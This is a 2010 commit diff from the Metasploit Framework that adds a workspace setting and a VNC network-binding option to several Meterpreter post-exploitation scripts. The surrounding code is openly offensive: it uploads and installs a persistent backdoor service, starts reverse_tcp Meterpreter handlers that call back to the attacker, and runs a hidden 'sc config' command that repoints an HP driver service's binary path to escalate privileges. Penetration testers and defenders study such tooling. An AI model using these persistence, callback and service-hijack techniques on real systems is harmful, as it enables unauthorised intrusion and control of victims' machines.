Propogate the workspace down to multi-handlers

git-svn-id: file:///home/svn/framework3/trunk@8734 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2010-03-07 22:49:08 +00:00 · 2010-03-07 22:49:08 +00:00 · aebedfdb2d
commit aebedfdb2d
parent a0d5ce473b
5 changed files with 29 additions and 13 deletions
--- a/scripts/meterpreter/metsvc.rb
+++ b/scripts/meterpreter/metsvc.rb
@ -22,7 +22,7 @@ def m_exec(session, cmd)
 	while(d = r.channel.read)
 		b << d
 	end
-	r.channel.close			
+	r.channel.close
 	r.close
 	b
 end
@ -49,7 +49,7 @@ opts.parse(args) do |opt, idx, val|
 	when "-A"
 		autoconn = true
 	when "-r"
-		remove = true		
+		remove = true
 	end
 end

@ -74,7 +74,7 @@ client.fs.dir.mkdir(tempdir)

 %W{ metsrv.dll metsvc-server.exe metsvc.exe }.each do |bin|
 	next if (bin != "metsvc.exe" and remove)
-	print_status(" >> Uploading #{bin}...")	
+	print_status(" >> Uploading #{bin}...")
 	fd = client.fs.file.new(tempdir + "\\" + bin, "wb")
 	fd.write(::File.read(File.join(based, bin), ::File.size(::File.join(based, bin))))
 	fd.close
@ -105,14 +105,14 @@ end
 if(autoconn)
 	print_status("Trying to connect to the Meterpreter service at #{client.tunnel_peer.split(':')[0]}:#{rport}...")
 	mul = client.framework.exploits.create("multi/handler")
+	mul.datastore['WORKSPACE'] = client.workspace
 	mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"
 	mul.datastore['LPORT']   = rport
 	mul.datastore['RHOST']   = client.tunnel_peer.split(':')[0]
-	mul.datastore['ExitOnSession'] = false	
+	mul.datastore['ExitOnSession'] = false
 	mul.exploit_simple(
 		'Payload'        => mul.datastore['PAYLOAD'],
 		'RunAsJob'       => true
 	)
 end

-
--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@ -87,6 +87,7 @@ print_status("Agent executed with PID #{proc.pid}")
 #
 if(autoconn)
 	mul = client.framework.exploits.create("multi/handler")
+	mul.datastore['WORKSPACE'] = client.workspace
 	mul.datastore['PAYLOAD']   = "windows/meterpreter/reverse_tcp"
 	mul.datastore['LHOST']     = rhost
 	mul.datastore['LPORT']     = rport
--- a/scripts/meterpreter/pml_driver_config.rb
+++ b/scripts/meterpreter/pml_driver_config.rb
@ -1,6 +1,6 @@
 # $Id$
 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/
@ -83,9 +83,10 @@ client.sys.process.get_processes().each do |m|

 		# Our handler to recieve the callback.
 		handler = client.framework.exploits.create("multi/handler")
-		handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
-		handler.datastore['LHOST']   = rhost
-		handler.datastore['LPORT']   = rport
+		handler.datastore['WORKSPACE']     = client.workspace
+		handler.datastore['PAYLOAD']       = "windows/meterpreter/reverse_tcp"
+		handler.datastore['LHOST']         = rhost
+		handler.datastore['LPORT']         = rport
 		handler.datastore['ExitOnSession'] = false

 		handler.exploit_simple(
@ -94,6 +95,7 @@ client.sys.process.get_processes().each do |m|
 		)

 		client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= %SystemRoot%\\system32\\HPZipm12.exe", nil, {'Hidden' => 'true'})
-			
+
 	end
 end
+
--- a/scripts/meterpreter/srt_webdrive_priv.rb
+++ b/scripts/meterpreter/srt_webdrive_priv.rb
@ -104,6 +104,7 @@ client.sys.process.get_processes().each do |m|

 		# Our handler to recieve the callback.
 		handler = client.framework.exploits.create("multi/handler")
+		handler.datastore['WORKSPACE']      = client.workspace
 		handler.datastore['PAYLOAD'] 		= "windows/meterpreter/reverse_tcp"
 		handler.datastore['LHOST']   		= rhost
 		handler.datastore['LPORT']   		= rport
@ -119,3 +120,4 @@ client.sys.process.get_processes().each do |m|

 	end
 end
+
--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@ -16,6 +16,7 @@ opts = Rex::Parser::Arguments.new(
 	"-i"  => [ false,  "Inject the vnc server into a new process's memory instead of building an exe"],
 	"-P"  => [ true,   "Executable to inject into (starts a new process).  Only useful with -i (default: notepad.exe)"],
 	"-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
+	"-O"  => [ false,  "Disable binding the VNC proxy to localhost (open it to the network)"],
 	"-V"  => [ false,  "Disable the automatic launch of the VNC client"],
 	"-t"  => [ false,  "Tunnel through the current session connection. (Will be slower)"],
 	"-c"  => [ false,  "Enable the VNC courtesy shell"]
@ -32,10 +33,12 @@ lhost    = "127.0.0.1"

 autoconn = true
 autovnc  = true
+anyaddr  = false
 courtesy = false
 tunnel   = false
 inject   = false
 runme    = "notepad.exe"
+pay      = nil

 #
 # Option parsing
@ -53,6 +56,8 @@ opts.parse(args) do |opt, idx, val|
 		runme = val
 	when "-D"
 		autoconn = false
+	when "-O"
+		anyaddr = true
 	when "-V"
 		autovnc = false
 	when "-c"
@ -85,17 +90,23 @@ else
 	pay.datastore['LPORT'] = rport
 end

+if (not courtesy)
+	pay.datastore['DisableCourtesyShell'] = true
+end
+
+if (anyaddr)
+	pay.datastore['VNCHOST'] = "0.0.0.0"
+end
+
 if autoconn
 	mul = client.framework.exploits.create("multi/handler")
 	mul.share_datastore(pay.datastore)

+	mul.datastore['WORKSPACE'] = client.workspace
 	mul.datastore['PAYLOAD'] = payload
 	mul.datastore['EXITFUNC'] = 'process'
 	mul.datastore['ExitOnSession'] = true
 	mul.datastore['WfsDelay'] = 7
-	if (not courtesy)
-		mul.datastore['DisableCourtesyShell'] = true
-	end

 	mul.datastore['AUTOVNC'] = autovnc